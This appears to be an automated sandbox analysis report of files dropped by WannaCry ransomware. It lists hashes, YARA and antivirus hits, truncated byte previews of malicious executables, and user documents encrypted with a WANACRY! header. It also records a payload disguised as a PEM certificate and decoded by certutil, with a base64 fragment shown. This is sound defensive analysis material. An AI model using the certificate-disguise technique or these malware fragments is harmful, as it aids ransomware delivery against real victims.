                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........p..y .....!..............................@n......................... .......4....@... ......................0..m)...`...4......<.......................85..................................................,g...............................text...............................`.P`.data....-..........................@.`..rdata.......@.......0..............@.`@.bss....d.... ........................`..edata..m)...0...*..................@.0@.idata...4...`...6...6..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..rsrc...<............p..............@.0..reloc..85.......6...v..............@.0B/4..................................@.@B/19.....n|... ...~..................@..B/31..................,..............@..B/45..................B..............@..B/57.....$............T..............@.0B/70....."............\..

                                                  C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3098624
                                                  Entropy (8bit):6.512654975680739
                                                  Encrypted:false
                                                  SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                  MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                  SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                  SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                  SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\TaskData\Tor\tor.exe

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3098624
                                                  Entropy (8bit):6.512654975680739
                                                  Encrypted:false
                                                  SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                                  MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                  SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                                  SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                                  SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Cm8..................#..D/..H............#...@.........................../......./...@... .............................. ...2..............................D]...........................p.......................'...............................text...t.#.......#.................`.P`.data.........#.......#.............@.`..rdata........$.......$.............@.`@.bss....`G....-.......................`..idata...2... ...4....-.............@.0..CRT....4....`........-.............@.0..tls.... ....p........-.............@.0..reloc..D].......^....-.............@.0B................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\TaskData\Tor\zlib1.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                  Category:dropped
                                                  Size (bytes):107520
                                                  Entropy (8bit):6.440165833134522
                                                  Encrypted:false
                                                  SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                                  MD5:FB072E9F69AFDB57179F59B512F828A4
                                                  SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                                  SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                                  SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....&...................@.....b......................... ...........@... .....................................................................................................................$................................text...d$.......&..................`.P`.data...X....@.......*..............@.0..rdata..pW...P...X...,..............@.`@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\WANNACRY.bin

                                                  Download File
                                                  Process:C:\Windows\System32\cmd.exe
                                                  File Type:PEM certificate
                                                  Category:dropped
                                                  Size (bytes):33755
                                                  Entropy (8bit):5.201671057656061
                                                  Encrypted:false
                                                  SSDEEP:768:9M2kjfGNe5JJ0Qpruz9hGFDp2yONFntn/kH:jaMyJ/pruz9YLKu
                                                  MD5:6B462CCA3BA672D680A227C3BA02B555
                                                  SHA1:612C4F426F4164E719C39D1788220268935649FA
                                                  SHA-256:1B1063969DA8D3A22AC2D7BD06DDDE9EEAAD2C2EDF9598BF6090F8FD59DE9B61
                                                  SHA-512:D92CFEF7B956322AAA84A872EDCFE68D9607ECEDE459A6F646DA7F69C13A48FCDF65886AEB238BA2F61591090570F4E6130BA44138639369C530850C95A5CA2D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: SUSP_certificate_payload, Description: Detects payloads that pretend to be certificates, Source: C:\Users\user\Desktop\WANNACRY.bin, Author: Didier Stevens, Florian Roth
                                                  Reputation:unknown
                                                  Preview:-----BEGIN CERTIFICATE-----..TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v..dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADgxTrRpKRUgqSkVIKkpFSC..37hYgqakVILLu1+CpaRUgie4WoKgpFSCy7tegq+kVILLu1CCoKRUgmerCYKppFSC..pKRVggekVIKSgl+Co6RUgmOiUoKlpFSCUmljaKSkVIIAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAABQRQAATAEEAEGP50wAAAAAAAAAAOAADwELAQYAAHAAAAAgNQAAAAAA..uncAAAAQAAAAgAAAAABAAAAQAAAAEAAABAAAAAAAAAAEAAAAAAAAAACgNQAAEAAA..AAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAKjVAABkAAAA..AAABAKCfNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAA2AEAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAsGkAAAAQAAAAcAAAABAAAAAAAAAAAAAA..AAAAACAAAGAucmRhdGEAAHBfAAAAgAAAAGAAAACAAAAAAAAAAAAAAAAAAABAAABA..LmRhdGEAAABYGQAAAOAAAAAgAAAA4AAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA..oJ80AAAAAQAAoDQAAAABAAAAAAAAAAAAAAAAAEAAAEAAAAAAAAAAAAAAAAAAAAAA..AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                  C:\Users\user\Desktop\WannaCry.cmd

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223568
                                                  Entropy (8bit):7.999269544491864
                                                  Encrypted:true
                                                  SSDEEP:98304:rJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyJyk:t
                                                  MD5:8185E422B95FD15C2E069EE8C92C1914
                                                  SHA1:C5CEADE352DDBC353C49CDF9963DB634A1B6DF51
                                                  SHA-256:E44CE2AE7E255DBDFE9B4CA81DDA46DAF65194414D095A9AD6F79026B4A51307
                                                  SHA-512:5469F0ABB3E13867067190FE33D45FB14A54A08DA206C0D0FCFB0519B8F0CE11AEE31DD945981D6DF9388D3449A487A7D2902A740D53603B894D565651CEC20D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:.....GE....bcg.U.+...".5E].L.,...Q.IvK.#...~.O....L%..}.R.{..U...Cjd...U.?...Q.... K...x..4..U...X...g..2iH...........d.^..G.|..>.V.;3.-B."..w..#....2..y..)...9..|.l..X;"b...\.v.Sp...0.8Ls.a..?s...=#}..s.O.Z,.....>....v..-.......k..B.;....%k...9F.[\.Sc..Jk.@.. ...b,..z...=.U..Y".!..H....aV....o.....~~dBcY..ts|......"..2.Kt./..{...H.../.L........E(^.=..`....>-.mQ*.p...H.*.rs?s..Q.b.\..!...U...`...s.T5..'.H)Xo}.[..u..k...4..^...1@.d~.{C|./.....L....q..}V7}x....4..hnk..*..'.%S..m......e.L.'.'..&......PW...B.\..s.PT)..'...#g7.U...t.)..m+.N.#.cd.2kj" .+.G...-..n...d.w.h.N.i.....RV.K.......X.GG@s..D.y.^.......C..7.3...<].tu=...$).x.......%6FB@o .j......2%X.X...JMP.K...G..r.S....f.0.j.I(.F..S2+.............S.D...........C.0..`..H..p...8....3t`R.tl..."h..U..n...`c..@.1.s.s..v....F^.......\\.N.~6N........Z..w}.S....]A_......Z.8Fq?.:...{...d..A..B.%.;......V.A...U... !.WM!...E........<...X.b.@..L..+kiR..3;?x.#.;....@....;..E.VXt"pi.sW|..KvL.*Y....

                                                  C:\Users\user\Desktop\WannaCry.cmd.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223848
                                                  Entropy (8bit):7.9999697024458065
                                                  Encrypted:true
                                                  SSDEEP:98304:r4f1OoM8yU0PwRSTJCkS8fbZPIgxnEA0JnCDZvq6E7Io+gLLf9bkdGeiLB+:8fJM8y5iSTJZ1PIenEA0ZAvqV0oTLVb2
                                                  MD5:5EB56BFAB83A034484159FA646B9F9D7
                                                  SHA1:C8AAFA07ACF9810A214E7960248BEF1EC6A04032
                                                  SHA-256:6B00D6AE6AD2EA5B9B8BB05A3029D17C0CD4222A811FC9E83993D3C46437ABED
                                                  SHA-512:875E0B5E4E883C59E525F47251EF065084EEB454BCAED285F3BBC0A56492EAD2FB0332E59CE7CEB939465AE337BF0766E75C5A9E581259E249E6B5557057AB9A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....inA..Y...0..V..,......~aQ*..A...na.y;.i.0Vo..~...B.0........$..l.;.0V.| 0..E1....q.9.x.{/0..............J...K...5k.}......%}..."u8.t~..x5.2.......,..R...P..(.....@..QF..^.3.U..K......g...%..X..|..G.'..Tx..^B..Q.u..~..v..2.........TK.B.U.~avE......^......w.ue...@*bz&..a.5.....AT.wF...v..m...P.EZ.@j...g..9.~c~^.!K.\.p..).{ .HB2>..F....W.O...A0.F..L.L.^5.C.Z.......E,......r....:..C...0.,.....!.......%/.Z..Q .......m...{.<.,V..K.c..E;.........I?...Jt..[s+w.h=....Ph.:g.z ...A...j.Oj.._.@..,e}u.e.n....2.t....mDVJ.../.....:........*Eg..x.;.o.z.....G"i.}"k..1......n&...uPZ..a.].-.....u.]W.Y/.y...DGp.f.OadX<..`[.Yz.AKFR..F%.J.._-...f.:.`.6.~....M..xl..a.5......9....Q..s<.bO.{'`..d.R.6C.....pMt.q..3.P.6.3..[gk.'..>...t...Z.k..T./.|.....C....3:..5[D....}.%.....3...........[&..P:.-.NUk.P^.......#..|.:{.A.?_.RzPg.&z.,..W:L.|[.....O.B...>...P .......C.....g~&I..D..AO..E..,.........I..r.>.x-.V.nde-...-9....O..|..#.7.4.w..YqN.l......8..0Q

                                                  C:\Users\user\Desktop\WannaCry.cmd.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6223848
                                                  Entropy (8bit):7.9999697024458065
                                                  Encrypted:true
                                                  SSDEEP:98304:r4f1OoM8yU0PwRSTJCkS8fbZPIgxnEA0JnCDZvq6E7Io+gLLf9bkdGeiLB+:8fJM8y5iSTJZ1PIenEA0ZAvqV0oTLVb2
                                                  MD5:5EB56BFAB83A034484159FA646B9F9D7
                                                  SHA1:C8AAFA07ACF9810A214E7960248BEF1EC6A04032
                                                  SHA-256:6B00D6AE6AD2EA5B9B8BB05A3029D17C0CD4222A811FC9E83993D3C46437ABED
                                                  SHA-512:875E0B5E4E883C59E525F47251EF065084EEB454BCAED285F3BBC0A56492EAD2FB0332E59CE7CEB939465AE337BF0766E75C5A9E581259E249E6B5557057AB9A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....inA..Y...0..V..,......~aQ*..A...na.y;.i.0Vo..~...B.0........$..l.;.0V.| 0..E1....q.9.x.{/0..............J...K...5k.}......%}..."u8.t~..x5.2.......,..R...P..(.....@..QF..^.3.U..K......g...%..X..|..G.'..Tx..^B..Q.u..~..v..2.........TK.B.U.~avE......^......w.ue...@*bz&..a.5.....AT.wF...v..m...P.EZ.@j...g..9.~c~^.!K.\.p..).{ .HB2>..F....W.O...A0.F..L.L.^5.C.Z.......E,......r....:..C...0.,.....!.......%/.Z..Q .......m...{.<.,V..K.c..E;.........I?...Jt..[s+w.h=....Ph.:g.z ...A...j.Oj.._.@..,e}u.e.n....2.t....mDVJ.../.....:........*Eg..x.;.o.z.....G"i.}"k..1......n&...uPZ..a.].-.....u.]W.Y/.y...DGp.f.OadX<..`[.Yz.AKFR..F%.J.._-...f.:.`.6.~....M..xl..a.5......9....Q..s<.bO.{'`..d.R.6C.....pMt.q..3.P.6.3..[gk.'..>...t...Z.k..T./.|.....C....3:..5[D....}.%.....3...........[&..P:.-.NUk.P^.......#..|.:{.A.?_.RzPg.&z.,..W:L.|[.....O.B...>...P .......C.....g~&I..D..AO..E..,.........I..r.>.x-.V.nde-...-9....O..|..#.7.4.w..YqN.l......8..0Q

                                                  C:\Users\user\Desktop\WannaCrypt0r.sk

                                                  Download File
                                                  Process:C:\Windows\System32\certutil.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3514368
                                                  Entropy (8bit):7.995470941164686
                                                  Encrypted:true
                                                  SSDEEP:98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
                                                  MD5:84C82835A5D21BBCF75A61706D8AB549
                                                  SHA1:5FF465AFAABCBF0150D1A3AB2C2E74F3A4426467
                                                  SHA-256:ED01EBFBC9EB5BBEA545AF4D01BF5F1071661840480439C6E5BABE8E080E41AA
                                                  SHA-512:90723A50C20BA3643D625595FD6BE8DCF88D70FF7F4B4719A88F055D5B3149A4231018EA30D375171507A147E59F73478C0C27948590794554D031E7D54B7244
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Joe Security
                                                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: ReversingLabs
                                                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: us-cert code analysis team
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 94%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..T...T...T..X...T.._...T.'.Z...T..^...T..P...T.g.....T...U...T..._...T.c.R...T.Rich..T.........................PE..L...A..L.................p... 5......w............@...........................5.................................................d.........4..........................................................................................................text....i.......p.................. ..`.rdata..p_.......`..................@..@.data...X........ ..................@....rsrc.....4.......4.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.docx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.80440826011533
                                                  Encrypted:false
                                                  SSDEEP:24:A+3kiKL/6QBiSYV1FKPqatxul8dfLaqAAbfnW/xp2GgH:A+0//6Liq/mdGgbfnW/x4
                                                  MD5:12EA2208D6C0B8FF88A3DAEEDB6664EC
                                                  SHA1:0BD3BAA4B5D07CC9C6FE03AB03578C6CED7C675C
                                                  SHA-256:30E40311A5DA56B950E9B1AACD3E80D65DC8FAB3F5F0532E182234C19CFC8D0C
                                                  SHA-512:49204C016A91E16273D67DEE37F5AA3AD20E6B09A8937D57239CE6E93ED471F3C6A66A9CD10BA514064F47B14357478A8867073DEC88A042CF78F55DBFB46676
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.f<.9.w.]s.a9.c'...h-..=k......R....!4t.S.AN.\..U.U.?...a........W..j....mUy0....;..x..._.f..........Bh/.>..'t..G:F...r\|.Bc.gA,..!..D.r.[....{...._.\....H...}....&5.S..E<..c.U4..Ch..a0..h=..9w.._x......).......jO....4c......P...v...R~W?.b..'Q..i'.^=..........C.x..j$....2R.../....@KQ...N.......y..:[&.B.......^z.|.At....h.\.\;v..V..B.9P...OU......#....!..,.(m...6v?.`......!..W.DW...X..P@....cX..#......w......[.}.....Z..D...!..B..._...:..7...8.....\^.u.5y..I...t..-.c....z.^4.AW....+..`)..]...p..'..T..LV...lz5.5P.VF....#1\v... ....$W.%..BM}.9....wF.pmbo.....F.e..P2.S..5c..<"....l...o...t.,]{g,........h....c...k..(.%.&8..Xt.../}0..}..W...H(U......*'D.K...4.a..Y*....e.a.6.>...=b..t.PT.]......'K.?X>......v}/D.9....wC.O.B.....J.d...V.;....47M.8.*I8=...~...@r[S....%k.....;.t...=..f..% .s...q*..Bp.KU.P..0..0A....!.....Ze*....u..B.P...j..m...^..E#&-u...3.Tw...7.jw..#.9._...{..u?9..B4Es...HK..F.. ....;..V....F@ra..6.a........Y..7......

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.docx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.836125606795506
                                                  Encrypted:false
                                                  SSDEEP:24:bkWHaIFSX9XCPOPd3SRU98U98Y3k+4G1CPPY5xvPehyP0nUGV7xzPQHOzhryXFI8:bk9sSXbF3SRUb98Y3hqgNPGi0DV7hAOq
                                                  MD5:C650F1176A21E75BCF6E1FF968905BA0
                                                  SHA1:ED537ED83A083F987DC532B68374BE6B7FF9A7B4
                                                  SHA-256:703FB662B319B55CA2CE8F7DA63858632DD62255377FAC8E62392B8BD5C94CBD
                                                  SHA-512:166B28072270B22E8557DD5A5777864DA70E59A64D5A0C4CA27E38005A73F07C69DDD2003E468450512E4158AAEB93D8AAFEE15EBAF630C2DDF10DEAC8BD13B6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.>.4..,.A.x..]\.%....@w~.k..W.m.[.GT...F.....D..VW.m..2e^..*...^.V....`..&Bg....nN.....,.c6;g@.&.......?...o...].M.D.....pE..S/....Ht........D.+...5.:.H..l.,..Ve.V..._O.N4...B.o.........f.....p.4.._@i..f.v.^.Vv4:..|.W....4..!..y#.....F..I:...E..s................ ..\..pL....O@..IS.... L..]..<..U...Ti..m..z~,..%..dV|._Sr.j.....$x<..9b.>s.......]..$.%....}a~}.c%*....I.v~.*.[......h..~.....n.E.f.:.w.V"KR.J".. +...pP..C-...F......kl.r.. #....."b...a...I].?F......[.~......3....W.D.a.....6Q/..)]p...u....N.;..<G.....j....(..m..c..A.yQ...<.8@+.9..f...#..G.f...........[......7.m]S.afZ..|.Y...!...t..:..Z...H..2IL..q9.e..4<.D....j.u......|n..V...W0v.]...+.O.f.Qb.g...-..Y.u..<.!..N.h.,..T*I....!...qS..._.]JE..u..$.\...x..+...W.;...1.Y...E\.rB..r......Z........:...i'..M1Rv. ..a...1w#`.....o....B....@q.lc......*.Hs4|..z......kf)..I+n[u.......V.1P...g...^R}:......Y..._..k....f_.u.p1r!..a1;.#..Q....g+.&.7.9.x&..{....r5.g...z.......@...

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.836125606795506
                                                  Encrypted:false
                                                  SSDEEP:24:bkWHaIFSX9XCPOPd3SRU98U98Y3k+4G1CPPY5xvPehyP0nUGV7xzPQHOzhryXFI8:bk9sSXbF3SRUb98Y3hqgNPGi0DV7hAOq
                                                  MD5:C650F1176A21E75BCF6E1FF968905BA0
                                                  SHA1:ED537ED83A083F987DC532B68374BE6B7FF9A7B4
                                                  SHA-256:703FB662B319B55CA2CE8F7DA63858632DD62255377FAC8E62392B8BD5C94CBD
                                                  SHA-512:166B28072270B22E8557DD5A5777864DA70E59A64D5A0C4CA27E38005A73F07C69DDD2003E468450512E4158AAEB93D8AAFEE15EBAF630C2DDF10DEAC8BD13B6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....S.>.4..,.A.x..]\.%....@w~.k..W.m.[.GT...F.....D..VW.m..2e^..*...^.V....`..&Bg....nN.....,.c6;g@.&.......?...o...].M.D.....pE..S/....Ht........D.+...5.:.H..l.,..Ve.V..._O.N4...B.o.........f.....p.4.._@i..f.v.^.Vv4:..|.W....4..!..y#.....F..I:...E..s................ ..\..pL....O@..IS.... L..]..<..U...Ti..m..z~,..%..dV|._Sr.j.....$x<..9b.>s.......]..$.%....}a~}.c%*....I.v~.*.[......h..~.....n.E.f.:.w.V"KR.J".. +...pP..C-...F......kl.r.. #....."b...a...I].?F......[.~......3....W.D.a.....6Q/..)]p...u....N.;..<G.....j....(..m..c..A.yQ...<.8@+.9..f...#..G.f...........[......7.m]S.afZ..|.Y...!...t..:..Z...H..2IL..q9.e..4<.D....j.u......|n..V...W0v.]...+.O.f.Qb.g...-..Y.u..<.!..N.h.,..T*I....!...qS..._.]JE..u..$.\...x..+...W.;...1.Y...E\.rB..r......Z........:...i'..M1Rv. ..a...1w#`.....o....B....@q.lc......*.Hs4|..z......kf)..I+n[u.......V.1P...g...^R}:......Y..._..k....f_.u.p1r!..a1;.#..Q....g+.&.7.9.x&..{....r5.g...z.......@...

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805428173096447
                                                  Encrypted:false
                                                  SSDEEP:24:QmGYGywT47l5zenulYUDGRpq1FDApRj1Br8jqy:QdhywYakGRWF0f1mjt
                                                  MD5:A6380DB5FBCDAE0BD6936F3FE846F45A
                                                  SHA1:49ACEEB0D348BE85272692EE54453CF2430DF1E7
                                                  SHA-256:CD84DCC255564CAE182304573309C2D5AB7F6313B82FC87FA8D713F05F500E5E
                                                  SHA-512:28D689A53A54DB40AB90EF31988D6079781D2029CC1D349D273EB82B578C4F1F54AEDBFE4FB77D6815563AF6C5C058B11936E94C6AD2B473AA61C1CEB4FBF4CB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:%^.+...*qaE....~..<.Z.ER..<.LG.3.b!..^K.+..V...#...<..,9..^^E.Pc.X...<f.k......#.].5.B{ty....,..Gk..Y..@.r.U...)..a...M..t.%^..%.._.a.meC....-... 9.a.8E...P..&..|!$`./..6zP.zyl......N.&eW).^...r.+.p.5...O.C4..&...C..I.....\.NB.+..'.....5..*.~9..\..............N...#..*k........." RJ..4P..vu..ee......O{[m....F.t..2.s.rpy.}....eVh..[...|...Wh4/\...e.F.n.P....r2.+.......7......G..\..XP"...@g.P.2. ..C=[l....f.2"S....`.S........F".c0B..V..D.r.@....`,........I..NZ...G.A.......rk..;pBT.(T..$.z.'...y.Hz.............c.uiw}'..*e......t..i..'...j.?b.M.....Z..A....a.........q.c.....LH.......f.s.'..t'F........#"4sM...._)w.8...y..sb........_..+..M]H.dD...+..M^.G..,.%D....;.......i.k..x\...+.57....\te....a...3-..$Cj.\pQ..Y..2o.4.Q=.'.$~G.'9..i.~....]....!.C.Z...v..._S.c.......d.U.?.....%........>P.Sa...}.$&T.....d{."\..t......w...8..K>O.s..)..`4t..."V2.....tn...N....&8...s.(.J.M:........x.-^.........W'"..k..h...".Y.B......U.]/.8........r/...k.j.

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842491723541216
                                                  Encrypted:false
                                                  SSDEEP:24:bkwHT5MFhVyDUwkd21pywojLn5wRHmf8eGiB5NwmWv+5g7GEwNtgPbnshnJOEe:bkwMyDUwW2WwWLC4f8UHam15UGEwmae
                                                  MD5:C28A402F4DD6085940848637E61D85FF
                                                  SHA1:6A064995E7F83A46749A3E85AD0B30DEDC11D1BC
                                                  SHA-256:19733DE0BC183A0F773E0E3CFCCF06EE3DD534FADC085821080632F11D3E4BD7
                                                  SHA-512:813B5CCFF43B109EC915FA587680BA9397764F91BE4255F230EC763880AC06E21A64DB85EFC29D871BAE0FC056FB6D0283D2BB19F7A4FB2D87F376EC637DCBC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....1"z+88{...{..h.~....co..e=2.9/..x..9.8fdf.~;..l<..w.M...v&.0....D7,..$..%5%.;......?....%.l.....#...].[.&.Vo.C^.nTl...2..{.x..=....9..l2.z...\..?...W..oXGgf..P......<..^.N...4%i...R..7y.zf..t.. G....R..S.g.....x.I..Pm.TY&....Q..;...Kx..@_H?...!............h.j]}f|....8^]n.g.M........?...0B..3.H.....,..J.....\..&......!-.\(...W8.Q.&..b\.j.1K.*).O...`....h..4.G....h.p.hM.G..........W5..qL.;b.......b....u1X3~..e..=..Xu...:....uy_..r....x..x...g.5...8|........VQ..~.,.h...Ob...>..%.x..$.1...S|@.z.E..eD.Y........H....o"d..1.D.9..3(..c...o.w.@..~;..z...!..>r>..q..!......q.U..A....Xp.......$........H...........}.}IY.$D..........<8P.~.A.~X.....I3j.C......._...(.+....9...1..;>v....rX]..:...k..?c..M+a.r.D....P..cb..s.........I..n..3..;_5.........G.b?.HG..9.6.R:.....N...}/.........n*.s+5.VT..@..l;yaNj..kW...uo...Y..wq<._;.P....y&.yI.......>d..\"V..T*.M..1#.`.7.{$.+b81@n.l".1gc.."'g..s.0..<".......URf.....p........o..S..W.RjO..

                                                  C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.842491723541216
                                                  Encrypted:false
                                                  SSDEEP:24:bkwHT5MFhVyDUwkd21pywojLn5wRHmf8eGiB5NwmWv+5g7GEwNtgPbnshnJOEe:bkwMyDUwW2WwWLC4f8UHam15UGEwmae
                                                  MD5:C28A402F4DD6085940848637E61D85FF
                                                  SHA1:6A064995E7F83A46749A3E85AD0B30DEDC11D1BC
                                                  SHA-256:19733DE0BC183A0F773E0E3CFCCF06EE3DD534FADC085821080632F11D3E4BD7
                                                  SHA-512:813B5CCFF43B109EC915FA587680BA9397764F91BE4255F230EC763880AC06E21A64DB85EFC29D871BAE0FC056FB6D0283D2BB19F7A4FB2D87F376EC637DCBC9
                                                  Malicious:false
                                                  Reputation:unknown
